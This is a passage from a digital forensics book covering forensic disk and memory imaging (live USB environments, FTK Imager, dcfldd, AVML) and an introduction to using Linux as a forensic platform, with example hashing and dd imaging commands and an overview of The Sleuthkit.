  • 181. Chapter 9 - Forensic imaging in a nutshell 174 Using a Live USB In scenarios in which it is not feasible to get access to physical media, a Live USB might provide an alternative. A Live USB contains an operating system which can be booted during the boot phase of a computer. In order for a live USB to function it is required to interrupt the boot cycle of a computer and select the boot from USB option. Manufacturers have different hotkeys to access this functionality. Note that it is also possible to boot from a CD/DVD in a similar manner, in that case, select the CD/DVD option. While it is still necessary to take a server or service offline, it is not required to open it up and take a hard drive. Similarly, continuous miniaturization means that some SSDs can no longer be removed from a motherboard. Luckily there are a number of free Live USB tools that can be used to circumvent these limitations and acquire forensic images. One of the most well known tools is CAINE (Computer Aided Investigative Environment)²⁰⁹. CAINE is a Linux live environment and mounts any discovered drives as read-only by default to ensure the forensic integrity of the disks. It provides GUI-based tools for the following operations: • Imaging of a disk (Guymager) • Disk Image Mounter (Xmount) • DDrescue • Enabling write operations • Mounting remote file systems across a network In addition to its disk imaging tools, it provides a forensic environment which can be used to perform most forensic operations including accessing various file systems, recover data, performing memory analysis and other operations. Another example of a forensic Live USB environment is Sumuri Paladin Edge²¹⁰. This Live USB environment is available free of charge. In addition to imaging the entire disk, it also allows you to convert images, find specific files, extract unallocated space, and interface with network shares. It is recommended to have a Live USB option within your lab at all times and to equip your forensicators with USB drives in case of onsite client emergencies. ²⁰⁹www.caine-live.net ²¹⁰https://sumuri.com/paladin/
  • 182. Chapter 9 - Forensic imaging in a nutshell 175 Disk imaging on Windows and Linux Situations might occur when a particular system cannot be turned off. There are various ways to perform a forensic acquisition depending on the operating system. Windows FTK Imager²¹¹ is a well-known tool to perform disk acquisitions on a Windows host. It is part of the FTK forensic suite developed by Exterro (formerly AccessData). However, the imager is also available free of charge. FTK Imager can either be installed on the host operating system or it can be used in a “lite” mode. Lite mode is preferable as no changes are performed on the disk, however be aware that it affects RAM memory. FTK Imager can be used to perform the following operations: • Disk acquisitions (both physical and logical) • Memory acquisitions • Acquisitions of the Windows Registry • Browse the filesystem and select relevant files/folders The following steps can be used to create a “Lite” version which runs in memory. These steps are based on the official guide provided by Exterro to the forensic community: 1. Install FTK Imager on another workstation 2. Insert a USB drive 3. Copy the installation folder to the USB-drive 4. Perform a hashing operation to ensure file integrity is in order ²¹¹https://www.exterro.com/forensic-toolkit
  • 183. Chapter 9 - Forensic imaging in a nutshell 176 Linux Linux historically has an integrated utility capable of copying files called dd. dd can also be used for disk imaging, however it was not build with forensics in mind. A duo of utilities is available to perform forensic disk imaging called dcfldd and dc3dd. Both tools can be used to perform disk imaging, however, their main advantage over dd is integrated hashing support for various hashing algorithms. All three utilities utilize the available Linux block devices in /dev/ to perform a physical disk image capture. An example of dcfldd is included below. Be warned that these tools can and will destroy evidence if used incorrectly. in this particular instance a 976 MB USB stick was inserted and the block storage device sdb1 is used. In this case a MD5 hash is generated, the hash log is available in the home folder along with the image. dcfldd if=/dev/sdb1 conv=sync, noerror hash=md5 hashwindow=976M hashlog=/home/ex ample/hash.txt hashconv=after of=/home/example/image.dd Virtual machines Virtual machines have become commonplace in the IT industry, in short allowing an organization to scale resources without purchasing additional hardware. The use of virtual machines is also advantageous for imaging purposes. A client can offer to send the virtual hard drive files for forensic investigation. After performing the customary hashing procedures these files can then be converted if necessary. FTK Imager supports conversion of VMDK files to any other FTK image format, which in turn can be used by a forensic program or forensic suite. qemu-img²¹² can be used to convert various hard drive image formats to raw dd format. An example covering the conversion of a VMDK file is included below. qemu-img convert -f vmdk -O raw image.vmdk image.img ²¹²https://qemu.readthedocs.io/en/latest/index.html
  • 184. Chapter 9 - Forensic imaging in a nutshell 177 Memory forensics Background While the disk forensics focus on forensic artifacts from files and folders, more pertinent information can also be readily available within a computer’s memory. A computer’s memory, called Random Access Memory, or RAM for short, is used to carry out all active tasks of a computer. As such, it contains a wealth of artifacts not available through other means. For instance: • A list of active and (potentially) recently terminated processes • Active network connections • Entered system commands • Open file handles In order to collect this information, an application will perform a memory dump. A memory dump is exactly what it sounds like, the contents of the RAM extracted to a disk. Be aware that as the size of the RAM increases, an equivalent amount of disk space should be readily available for storage. Furthermore, the RAM does not remain in stasis while the extraction takes place. It will continue to perform tasks and will continue to change for the duration of the RAM dump. Windows Performing a memory dump on Windows can be performed by multiple tools. FTK Imager was already mentioned in the previous section. An alternative to FTK Imager in this regard is the utility DumpIt²¹³. DumpIt can be used without installation on the host system. The directory it is launched from also doubles as the destination directory. Take this into consideration before performing a memory dump. Linux There is no single version of Linux, every single distribution has its own intricacies and (minor) differences. A tool was needed that can perform a memory dump independent of installed kernels, packages, or other dependencies. Microsoft actively develops AVML²¹⁴. AVML can be used to perform a memory dump and also has a few tricks of its own. AVML supports compression of memory dumps to decrease the amount of required disk space as well as uploads to a Microsoft Azure Blob store. ²¹³https://github.com/thimbleweed/All-In-USB/tree/master/utilities/DumpIt ²¹⁴https://github.com/microsoft/avml
  • 185. Chapter 9 - Forensic imaging in a nutshell 178 The standard usage of AVML is shown below: avml output.lime It is possible to generate a compressed image with the following command: avml —compress output.lime.compressed For a full set of commands please refer to the GitHub development page. Virtual Machines Prevalent use of virtual machines impacts memory acquisition as well with its own advantages and disadvantages. One advantage is that memory collection has become easier. A virtual machine hypervisor allows a virtual machine to be suspended, hitting the pause button, and freezing all activity. During this process the contents of the RAM are written to disk, no additional tools are necessary to perform an acquisition. Files from popular vendors like VMware and Virtualbox can be analyzed by memory analysis tools like Volatility.
  • 186. Chapter 9 - Forensic imaging in a nutshell 179 Next Steps and Conclusion This chapter was designed to hit the ground running and assist a forensicator with imaging a desktop or server. What’s next in the investigation relies completely upon the research questions and associated context of the case itself. One final tip this chapter can provide is to focus on triage first and foremost. SANS has developed a poster for this specific scenario as part of its FOR500 and FOR508 courseware. It can be found at https://www.sans.org/posters/windows-forensic-analysis/. For tips on scaling triage, check out Chapter 11 of this book, written by the same author.
  • 187. Chapter 10 - Linux and Digital Forensics By Barry Grundy²¹⁵ | Website²¹⁶ | Discord²¹⁷ What is Linux? There are plenty of resources available on what Linux is, what roles it fills, and how it compares with other operating systems. Here we will discuss Linux from the perspective of digital forensics and incident response. There have been many discussions about what defines Linux. The classical definition is that Linux is a kernel (the “brains” of the operating system) augmented by user space drivers, utilities, and applications that allow us to interact with a computer in a useful manner. For the sake of simplicity, we extend the name “Linux” to encompass the entire operating system and even the applications that can be bundled and distributed. Linux was developed by Linus Torvalds at the University of Helsinki back in the early 1990s. It was, essentially, a “hobby” version of UNIX created for PC hardware. ²¹⁵https://github.com/bgrundy ²¹⁶https://linuxleo.com ²¹⁷http://discordapp.com/users/505057526421913600
  • 188. Chapter 10 - Linux and Digital Forensics 181 On 25 August 1991, Torvalds posted this to the Usenet group comp.os.minix: Hello everybody out there using minix I’m doing a (free) operating system (just a hobby, won’t be big and professional like gnu) for 386(486) AT clones. This has been brewing since april, and is starting to get ready. I’d like any feedback on things people like/dislike in minix, as my OS resembles it somewhat (same physical layout of the file-system (due to practical reasons) among other things). I’ve currently ported bash(1.08) and gcc(1.40), and things seem to work. This implies that I’ll get something practical within a few months, and I’d like to know what features most people would want. Any suggestions are welcome, but I won’t promise I’ll implement them :-) Linus ([email protected]) PS. Yes - it’s free of any minix code, and it has a multi-threaded fs. It is NOT portable (uses 386 task switching etc), and it probably never will support anything other than AT-harddisks, as that’s all I have :-(. –Linus Torvalds (quoted from Wikipedia²¹⁸)} Modern Linux is an operating system very similar to Unix, deriving most of its functionality from the much older AT&T Unix originally developed in the 1970s. This included a full TCP/IP stack and GNU development tools to compile programs. In short, Linux is mostly compliant with the Portable Operating System Interface for Unix (POSIX). Despite the warnings of lack of architecture portability and limited support mentioned by Torvald’s postscript, Linux has grown to a fully functioning operating system that supports a great deal of modern hardware. Standard SATA hard drives through modern M.2 and NVMe storage are robustly supported. Drivers and software support for newer motherboards and associated hardware are constantly improving and growing. The Linux kernel, where most of this support resides, has a very fast production cycle, and support for newer devices (where specifications are available) is rapidly added in most cases. For the digital forensics practitioner, this hardware compatibility issue can be exceedingly important. Not only must we verify and test that our hardware is properly supported and functioning as intended; but we also need to ensure that any subject hardware we might need to directly attach to our system (which we might do for a variety of reasons) is also properly detected and supported. This is often done via a direct physical connection, or via boot media on a subject system. While we have given a very general definition of what Linux is and where it originated, we should also mention what Linux is not, particularly where digital forensics is concerned. We will cover why you might want to use Linux for digital forensics in a later section, but for now, a beginner forensics ²¹⁸https://en.wikipedia.org/wiki/History_of_Linux#The_creation_of_Linux
  • 189. Chapter 10 - Linux and Digital Forensics 182 examiner should know that Linux is not a platform well-suited to “point-and-click”, or what some might refer to as “Nintendo forensics” techniques. While there are graphical user interface (GUI) tools available for Linux, it is not the strongest OS for that approach. More on that later. Linux can be fairly easy to install, particularly given modern desktop GUI front ends for configura- tion and settings. However, Linux is NOT a “better Windows”. Linux should not be approached as a replacement to Microsoft Windows - one that acts like Windows and is supposed to be familiar to someone who has been using Windows (or macOS for that matter) for years. Linux works very differently from some more mainstream operating systems. There is a steep learning curve and troubleshooting can seem overwhelming to someone used to running Windows on their computer. It is possible to use Linux as a primary driver for digital forensics, and many digital forensic practitioners have done this for years. That said, while Linux can be a fantastic learning tool and a great way to access forensic and operating system utilities on an alternative platform, it will remain a secondary operating system for most people new to the field. Now that we have a very basic idea of what Linux is and is not, let’s discuss why we might decide to add it to our digital forensic toolbox. Why Linux for Digital Forensics There are any number of reasons for choosing to learn and run Linux for use as a digital forensics platform. We will cover the more important ones here. Education If you are a student of digital forensics or a practitioner looking to better understand a particular forensic process, Linux provides an excellent environment for learning. Particularly for students, the sheer number of free tools available for Linux - not to mention the standard operating system utilities - make it accessible to all levels of income. No need for expensive licenses or dongles to be able to do a full analysis or participate in training. While it is true that many open source digital forensics utilities will compile and run natively on Windows, the ability to run multiple copies of Linux, either on physical computers or virtual machines, still makes it an attractive alternative for learning. Many of the tools available for digital forensics on Linux are meant to be used with the command line interface (CLI). To a beginner, it can certainly appear to be daunting. But learning at the CLI removes the clutter of a GUI and all the menus and mouse clicks required to complete a task. Most Unix tools adhere to the philosophy that they should do one thing, and do it well. As you learn what each tool does and how it works, you can string commands together to accomplish a whole series of steps with one command using multiple tools all at once (commonly referred to as piping). This approach allows you to concentrate on the results rather than on an interface with multiple windows and views to sort through. Again this is a benefit for education specifically. There is no doubt that a forensic software suite that ingests, analyzes evidence, and presents the results in a single step is
  • 190. Chapter 10 - Linux and Digital Forensics 183 more efficient. But learning from the CLI with specific and very targeted output can be immensely powerful for students. Free(dom)! Freedom and flexibility are just two of the many attributes that can help make Linux a useful addition to a forensic examiner’s toolbox. First and foremost, of course, Linux is free. As mentioned earlier, this means we can install it as many times on as many computers (or virtual machines) as we like. You can use it as any sort of server while not tying up valuable budget resources on licensing. This goes for the forensic software as well. You can install, copy, and share across multiple platforms and users, again without breaking the bank. For a practitioner learning the ins and outs of digital forensics, this can be very powerful. You can install multiple copies of Linux across devices and virtual environments in a simple home lab; deleting, reinstalling, and repurposing computer resources along the way. Installing and running Linux is a great way to re-purpose old hardware, which brings us to our next point. Linux provides unparalleled flexibility. It will run on all forms of hardware, from laptop and desktop computers, to mobile devices and single board computers (SBC). It will run in a variety of virtualization environments, up to and including Microsoft Windows’s own Windows Subsystem for Linux (WSL/WSL2). You can choose to run a Linux distribution on a workstation, on a $50 Raspberry Pi, in a virtual machine, or natively in Windows using WSL. These all have their benefits and drawbacks including cost, direct hardware access, convenience, and resource requirements. Another facet of Linux’s flexibility lies in the number of choices, freely available, that users have over their working environment. Desktop environments like KDE/Plasma²¹⁹, Gnome²²⁰ and XFCE²²¹ provide a wide range of choices that a user can customize for aesthetics or workflow efficiency. These desktop environments don’t change the underlying operating system, but only the way one interacts with that system. Paired with a separate window manager, there are hundreds of possibilities for customization. While it may sound trivial, we are not discussing wallpaper and icon themes here. We are talking about the flexibility to decide exactly how you interact with your workstation. For example, you can set up a Linux environment that focuses on primarily CLI usage where the keyboard is the primary interface and the mouse is rarely needed. This can be done with a wide selection of “tiling” window managers that open new windows in a pre-determined arrangement and allow for window manipulation, multiple workspaces, and program access all through customizable keystrokes and little or no use for a mouse. This is certainly not a configuration that will appeal to everyone, but that is one of the joys of Linux - the ability to completely customize it to match your particular workflow. ²¹⁹https://kde.org/plasma-desktop/ ²²⁰https://www.gnome.org/ ²²¹https://www.xfce.org/
  • 191. Chapter 10 - Linux and Digital Forensics 184 Control Another traditional benefit of Linux over other operating systems has historically been the control it provides over attached devices. This has always been one of the more important factors when adopting Linux in the context of a forensic workstation. Most operating systems are designed to isolate the user from the inner workings of hardware. Linux, on the other hand, has traditionally allowed for much more granular control over attached devices and the associated drivers. This has blurred somewhat in recent years with a number of popular Linux versions becoming more desktop- oriented and relying more and more on automation and ease of operation. While this approach does hide some of the control options from the user, they are generally still available. Again, with advances in recent years, this level of hardware control is not as exclusive to Linux as it once was. Cross verification - An Alternate OS Approach All of the preceding might come across as pushing Linux as a superior operating system for digital forensics. That is most certainly not the intention. Rather, an effort has been made to point out the strengths of Linux in comparison to other platforms. In reality, having Linux in your digital forensics arsenal is simply having access to a particularly powerful alternative tool. It is absolutely possible to utilize Linux as a primary digital forensic platform in today’s laboratory environment. It is also a reality that providing timely and usable information for non-technical investigators and managers often means utilizing the reporting and data sharing functionalities available in modern forensic software suites that most often run under mainstream operating systems and not Linux. So where does Linux fit into a modern laboratory where reality and caseload dictate the use of software suites with automated functionality? As an alternative operating system, Linux is often used to troubleshoot hardware issues where one platform either cannot detect or cannot access particular media. Linux is well known for its ability to provide better diagnostic information and sometimes better detection for damaged or otherwise misbehaving devices. When dealing with difficulties accessing a hard drive, for example, you will often hear the advice “connect it to a Linux box”. Being able to directly monitor the kernel buffer and view the interactions between hardware and the kernel can be a great help in solving hardware issues. There is also the benefit of having a completely different operating system utilizing a different toolset for cross-verification of findings. In some organizations, the cross-verification of significant analysis results is a requirement. Depending on the situation, validating a result can make good sense even when it is not explicitly required. Cross verification means that if a practitioner finds an artifact or draws a particular conclusion on a given piece of evidence, the finding can be reproduced using a different tool or technique.
  • 192. Chapter 10 - Linux and Digital Forensics 185 Consider the following simplified example: 1. A forensic examiner extracts user-created contents (documents, emails, etc.) from computer media and provides the data to an investigator using a common Windows forensic software suite. 2. The investigator identifies a particular document that can be considered valuable to the case being investigated and requests a report specific to that document. 3. The forensic examiner provides a targeted report detailing the document’s properties: times- tamps, ownership, where or how it might have originated on the media, etc. 4. The forensic examiner re-analyzes the specific document using a completely different tool perhaps on a completely different operating system (Linux in this case). Does the alternate tool identify the same location (physical disk location)? Are the timestamps the same? Is the document metadata the same? Differences, if any, are investigated and explained. The cross verification outlined above is somewhat simplified, but it provides an outline of how Linux can be employed in a laboratory environment dominated by Windows software and the need for efficient reporting. Using an alternative operating system and unique open source tools to cross- verify specific findings can help eliminate concerns about automated processes and the integrity of reports. Another benefit of using Linux to cross-verify findings is that you will learn the OS as you integrate it into your workflow rather than simply installing it and trying to make time to learn. Choosing Linux How does one start a journey into using Linux for digital forensics? We begin with a discussion of distributions and selecting your platform’s “flavor” of Linux. Distributions A Linux distribution (or “distro” for short) is a collection of Linux components and compiled open- source programs that are bundled together to create an operating system. These components can include a customized and packaged kernel, optional operating system utilities and configurations, custom-configured desktop environments and window managers, and software management utili- ties. These are all tied together with an installer that is usually specific to the given distribution. Because of the open-source nature of the Linux environment, you could grab all the source code for the various components and build your very own distribution, or at least a running version of Linux. This is often referred to as “Linux from Scratch” (LFS). With a distribution, the developers do all the heavy lifting for you They package it all up and make the entire operating system available to you for installation via a variety of methods.
  • 193. Chapter 10 - Linux and Digital Forensics 186 Some popular distributions include, but are certainly not limited to: • Ubuntu²²² • Manjaro²²³ • Arch²²⁴ • Mint²²⁵ • SUSE²²⁶ • Red Hat²²⁷ • Slackware²²⁸ • and many others So how does one choose a Linux distro, particularly for use as a digital forensics platform? Choosing Your Platform From the perspective of a digital forensics examiner, any distro will work within reason. The simplest answer is to download any popular distribution and just install it. In the long run, just about any flavor of Linux can be made to act and “feel” like any other. If you want to do some research first, consider looking at what is already in use. Does your lab or agency already use Linux in the enterprise? It may be a good idea to use a Linux version that closely matches what your organization already has deployed. If part of your job is to respond to company or agency incidents, a more intimate knowledge of the systems involved would be helpful. Another legitimate answer to the question of “which distro?” is simply to see what others around you are running. If you have co-workers or labmates that are running a specific version of Linux, then it makes sense to do the same. Being able to consult with co-workers and friends makes getting support much easier. There are, however, other points that might warrant scrutiny. Ubuntu, as popular as it is, has drifted toward a more desktop-oriented operating system. Configuration options and system settings have been made much easier through a number of GUI utilities and enhancements that make the distribution more focused on ease of use - the end user still has access to in-depth control of the operating system, but there might be some work involved in disabling some of the automation that might hamper forensic work (automatic mounting of attached storage, for example). Other Linux distributions offer a far more simple approach - minimally configured “out of the box”, leaving it completely up to the user to configure the bells and whistles often considered normal features for modern operating systems. Distributions like Slackware, Void Linux, and Gentoo fall into ²²²https://ubuntu.com/ ²²³https://manjaro.org/ ²²⁴https://archlinux.org/ ²²⁵https://linuxmint.com/ ²²⁶https://www.suse.com/ ²²⁷https://www.redhat.com/en ²²⁸http://www.slackware.com/
  • 194. Chapter 10 - Linux and Digital Forensics 187 this category. With these distributions, rather than making systemic changes to a heavily desktop- oriented configuration, you can start with a more streamlined workstation and work up, building a more efficient system. The learning curve, however, is steeper. Another consideration is the choice between a rolling release and an incremental release distro. Most operating systems are released in discrete numbered versions. Version X is released on a given date and typically receives only security updates and bug fixes before the next major version. Eventually, another release, version Y, is made available and so on. Distributions like Slackware, Debian, and (generally) Ubuntu fall into this category. For the most part, this release schedule is more stable, because components of the desktop and operating system are updated and tested together before release. For the forensic examiner, this approach introduces fewer mass changes to kernel components and software libraries that might affect the forensic environment or impact evidence integrity and the interpretation of examination results. A rolling release, on the other hand, continually updates software as new versions become available for everything from the kernel to base libraries. This has the benefit of always keeping up with the “latest and greatest”. Changes to upstream software are often immediately supported, though the overall experience may be slightly less stable and polished. One obvious downside to choosing a rolling distro is that wholesale changes to the operating system should trigger some validation testing from the forensic examiner. There should be no doubt that a digital forensics platform is operating exactly as expected. Constant mass upgrades can interfere with this by possibly breaking or changing expected outputs or hardware behavior. Examples of rolling release distros include Arch, Manjaro, Void, and Ubuntu Rolling Rhino. There also exist ready-made distributions specifically designed for digital forensics. Kali Linux, Caine, and Tsrugi Linux are common examples. These are generally used as bootable operating systems for live investigations, but can also be installed directly on hardware to use in a lab. These systems are ready to go with just about all the forensic software one might need to conduct digital forensics, incident response, or even Open Source Intelligence (OSINT). From an education perspective, ready-made forensic distributions have you up and running quickly, ready to learn the tools. What you might miss however is actually setting up, finding, and installing the tools yourself, all of which are part of the educational process. If there are no organizational considerations, then consider using a popular distribution with wide acceptance in the community. Ubuntu is the first distribution that comes to mind here. Much of the forensic software available today for Linux is developed and tested on Ubuntu. There is a huge support community for Ubuntu, so most questions that arise already have easily-accessible answers. While this can be said for other distributions (Arch Linux comes to mind), Ubuntu is certainly the most ubiquitous. If you choose to chart your own course and use a distribution along the lines of Slackware or Gentoo, you will start with a very ‘vanilla’ installation. From there, you will learn the ins and outs of configuration, system setup, and administration without a lot of helpful automation. Customization options are abundant and left almost entirely up to the user. It may be helpful to create a virtual machine snapshot with the setup you come to prefer. That way,
  • 195. Chapter 10 - Linux and Digital Forensics 188 a fresh copy can be deployed any time you need one without a lot of tedious prep.
  • 196. Chapter 10 - Linux and Digital Forensics 189 Learning Linux Forensics There are copious resources available for Linux learners, from distribution-specific tutorials and Wiki pages to command-line-oriented blogs and websites. You can take an online course from Udemy, edX, or even YouTube. Numerous presses publish dozens of books every year. The digital forensics niche in Linux is no exception, though you may have to dig a bit for the specific resources you need. Whether you are interested in “Linux forensics” as in using Linux as your forensic platform or as digital forensics specifically on Linux systems, there is no shortage of material for the motivated student. Linux as a Platform Most of what we have covered so far assumes an interest in choosing and installing Linux for use as a platform to perform forensics, either as a primary operating system or as an adjunct for cross verification. To use Linux this way, first, we learn the operating system itself: installation, configuration, network environment, and interface. This is common to all users, whether or not the system will be used for digital forensics. We, however, must consider in particular whether there are any “out-of-the-box” configurations or automations that interfere with evidence collection or integrity. Second, there are the tools we need to learn. These fall into a number of categories: - Evidence Acquisition - Volume analysis - File system analysis - Application analysis - Memory analysis - Network enumeration and analysis - Data parsing There are specific tools (with some crossover) for each of these categories that we’ll cover in the next sections. The Law Enforcement and Forensic Examiner’s Introduction to Linux, the LinuxLEO guide²²⁹, is available for free. Written by the same author as this chapter, the guide was produced as a complete guide for beginners. It covers installing Linux, learning the operating system, and using forensic tools to conduct hands-on exercises using sample practice files. The materials are freely available at https://www.linuxleo.com. ²²⁹https://www.linuxleo.com
  • 197. Chapter 10 - Linux and Digital Forensics 190 Linux as a target Perhaps you have no specific desire to use Linux as a day-to-day forensic platform. There is, however, something to be said for knowing how Linux works and where to look for evidence should you be assigned an analysis where the subject device runs a version of Linux. For years now, Linux has been a popular server operating system, utilized in enterprise environments across the world. In the past few years, there has been a steady growth of “desktop” Linux, particularly with the emergence of user-oriented distributions like Ubuntu, Mint, and derivations based on them. A growth in Linux-compatible software for specialized tasks such as video editing, publishing, and even gaming has resulted in Linux being more widely adopted. While the platform has always been well-represented in academia, the proliferation of Linux desktop applications has resulted in a much wider user base. Given the popularity of the Android operating system, which is (in simple terms) based on Linux, there has always been a stronger need for familiarity with Linux in the analysis of mobile devices. Note, however, that Android is not the same as the Linux we find on desktop computers. They are similar for sure, but their file system structures and application analysis are widely divergent. One of the biggest issues that arise when examining a Linux system is the breadth of options available to a user on a customized desktop or server. For example, an examiner must be at least somewhat familiar with a subject computer’s init system. Most modern distributions use systemd to control processes and logging. Other distributions rely on the older text-based BSD init or System V process scripts. In either case and depending on the nature of the investigation, knowing how processes are started and how they are stopped might be an important part of the forensic puzzle. Tracking and identifying user activity is often another important piece of the puzzle. With Linux, regardless of distribution, users have a wide range of choices for desktop environments, window managers, file managers, and many other desktop components. All of these components, some used in combination, store configuration and user activity in different formats and locations which makes having intimate knowledge of every possible iteration very difficult. Even the very low-level components of a Linux installation can differ - even within a single distribution. Users can choose a different bootloader (which loads the operating system) or a different file system format for various partitions. Most Linux distributions will use the Ext4 file system by default, but it’s a simple matter to select and install any number of others depending on preference and use case: btrFS, XFS, ZFS, JFS are all file systems you might encounter. Should an examiner come across one of these, consideration would need to be given to file recovery, allocation strategies to help determine file activity, and perhaps forensic software support. All of these are challenges with examining any of the myriad permutations of Linux. There are a few books covering the basics of Linux examinations. Much of the information available from a forensic perspective can also be found in videos and seminars. For anyone looking for a challenging focus for research or a subject for an academic project, Linux as a forensic target provides ample subject matter for unique content.
  • 198. Chapter 10 - Linux and Digital Forensics 191 Linux Forensics in Action The information covered so far gives an overview of Linux and where it might fit in a digital forensic workflow. For those just starting out, or for those that have never seen Linux in action before, it might be useful to actually see a very simple command line session from acquisition through artifact recovery and interpretation. First, let’s map a quick outline of what we wish to accomplish, and the tools we will use: 1. Define the goal of the examination (scope) 2. Acquire the evidence (imaging) 3. Verify evidence integrity 4. Map the forensic image and find a volume of interest 5. Identify the file system format within that volume 6. Identify artifacts (e.g. files) of interest 7. Extract and examine the artifacts 8. Parse data from each artifact
  • 199. Chapter 10 - Linux and Digital Forensics 192 The Tools There are far too many tools to cover in a single chapter. Again, documents like the previously mentioned LinuxLEO guide²³⁰ will cover a great number of tools with hands-on opportunities. Here we will select just a few tools to do a quick analysis of a Microsoft Windows Registry file. Purpose Tool Acquisition dd dc3dd dcfldd ddrescue ewfacquire Integrity verification (hashing) md5sum sha1sum sha256sum etc. Volume / File System / File Analysis The Sleuthkit (TSK): mmls fsstat fls istat icat blkcalc etc. Windows Artifacts Libyal (multiple tools/libraries): libregf libevtx liblnk libscca libesedb etc. File Carving scalpel foremost bulk_extractor Data Parsing General GNU Utilities: sed awk grep etc. ²³⁰https://linuxleo.com
  • 200. Chapter 10 - Linux and Digital Forensics 193 Acquisition Tools The acquisition tools in the above table work in generally the same manner, creating “bit for bit” or raw images that are essentially exact duplicates of the storage media being imaged. dd is the original Linux tool used for basic forensic imaging. It was not explicitly designed for that, but it is useful in a pinch, particularly because it will be available on just about any Unix or Linux system you might come across. Variants of dd include dc3dd and dcfldd. These are both forks of dd that were coded specifically with digital forensics and media acquisition in mind. Both include logging and built-in hashing capabilities with multiple available hash algorithms. There are also options to directly split the output files for easier handling. Command line imaging tools like dd and those based on it can seem a bit confusing to use at first, but they all follow the same basic command layout. In simplest terms, you have an input file defined by if=/dev/<device>. This is our subject media - the media we are imaging and will eventually examine. The output file - the image file we are writing to, is defined with of=<imagefile>. The file name is arbitrary, but the general convention is to use a .dd or .raw extension for images created with dd. The forensic-specific versions of dd extend the options. Using dc3dd as an example, the output file can be defined with hof=<imagefile> hash=algorithm to specify hashing the input media and the resulting image. An examiner can also split the output into smaller segments using ofs=<imagefile> ofsz=<size>. Combining the options gives a split file with all the segments and the original media hashed using hofs=<imagefile> hash=<algorithm> ofsz=<size>. The entire output can be documented with the log=<logfile> option. We will see an example of this in the scenario in the next section. Learning how to image with Linux command line tools is a useful skill for all digital forensic practitioners. Using Linux bootable media to access in-situ media is not uncommon.
  • 201. Chapter 10 - Linux and Digital Forensics 194 Evidence Integrity In general, command line collection of a forensic image should include calculation of a hash prior to imaging. This is usually followed by a hash of the resulting forensic image. In recent years, industry practitioners have taken to relying on the built-in hashing capabilities of their imaging tools to do the work for them. Manual hashing is both a good idea and a good skill to have. The algorithm you select to hash with (MD5, SHA1, etc.) will be determined by your organization’s policies and the standards you are working under. Issues surrounding hash algorithm selection are outside the scope of this chapter. Manually hashing media and files under Linux (or other command line environments for that matter) is quite simple: $ sudo sha1sum /dev/sdb 8f37a4c0112ebe7375352413ff387309b80a2ddd /dev/sdb Where /dev/sdb is the subject storage media. With the hash of the original media recorded, we can use dd to create a simple raw image: $ sudo dd if=/dev/sdb of=imagefile.raw Now hash the resulting image file and make sure the hash matches that of the original media (/dev/sdb). This means our image file is an exact duplicate, bit for bit, of the original. $ sha1sum imagefile.raw 8f37a4c0112ebe7375352413ff387309b80a2ddd imagefile.raw
  • 202. Chapter 10 - Linux and Digital Forensics 195 Volume / File system analysis Once we have an image and the integrity of our evidence has been verified, we need to focus our examination on the volume, file system, and artifacts pertinent to our case. This will include parsing any partition table (DOS or GPT in most cases), identifying the file system format (exFAT, NTFS, APFS, etc.), and finally identifying files or objects that need to be recovered, extracted, or examined for the investigation. The Sleuthkit (TSK)²³¹ is a collection of command line tools and libraries that can provide this functionality under Linux. Bootable distributions focused on digital forensics like Kali and Caine come with TSK by default. It can also be used on Windows and Mac systems. For a quick peek into an image file, it can be quite useful. No need to fire up a full GUI tool to do a quick file extraction or view the contents of a directory. The Sleuthkit supports the following file system types: • ntfs (NTFS) • fat (FAT (Auto Detection)) • ext (ExtX (Auto Detection)) • iso9660 (ISO9660 CD) • hfs (HFS+ (Auto Detection)) • yaffs2 (YAFFS2) • apfs (APFS) • ufs (UFS (Auto Detection)) • raw (Raw Data) • swap (Swap Space) • fat12 (FAT12) • fat16 (FAT16) • fat32 (FAT32) • exfat (exFAT) • ext2 (Ext2) • ext3 (Ext3) • ext4 (Ext4) • ufs1 (UFS1) • ufs2 (UFS2) • hfsp (HFS+) • hfsl (HFS (Legacy)) ²³¹https://sleuthkit.org/
  • 203. Chapter 10 - Linux and Digital Forensics 196 There are more than thirty command line tools in the TSK. We will use some of them in the sample scenario that follows this section: Tool Purpose mmls list partitions fsstat file system information fls list files istat file meta-data information (MFT entry, inode, etc.) icat recover file content Again, for a more detailed look at The Sleuthkit refer to the LinuxLEO Guide²³² for hands-on exercises and practice images. Artifact analysis Digital forensics is far more than just recovering deleted files. There are databases to parse, temporal data to extract and organize, and other artifacts to review and make sense of. Operating system changes, application version changes, and various format changes make keeping our knowledge up to date a challenging prospect. Luckily, there are a great many open source projects that specifically address the collection and analysis of everything from macOS plist to Windows shellbags. Using them might not be as simple as clicking a line item in a GUI forensic suite or selecting a specific view in a menu. But again, the open source tools very often provide a simple command line interface to provide an uncluttered look at the data we need most. In addition, many of these tools provide libraries to allow developers to include artifact parsing capabilities in more feature-rich tools. One example of this is Autopsy, a GUI digital forensic tool that utilizes Sleuthkit libraries to parse disk images, storage volumes, and file systems. Additional functionality is provided by external open-source libraries for artifact parsing and timeline creation. For those examiners that are proficient in the Python language, there are often specific Python libraries that can be used to parse artifacts. In some cases, the previously mentioned open source libraries will include bindings that provide Python code allowing us to write scripts that can parse artifacts of interest. One example of this is the libewf²³³ project. This library provides access to Expert Witness Format (EWF) images created by many acquisition utilities. The project includes tools like ewfacquire, ewfmount and ewfinfo to acquire and directly interact with common .E01 images. In addition to the tools, there are also libraries that can be included in other programs to provide access to EWF images. The Sleuthkit can be compiled with libewf support, allowing TSK tools to be used directly on .E01 images without first having to convert them to “raw” format. Finally, pyewf Python bindings are provided to allow anyone to create scripts using libewf functionality. ²³²https://linuxleo.com ²³³https://github.com/libyal/libewf
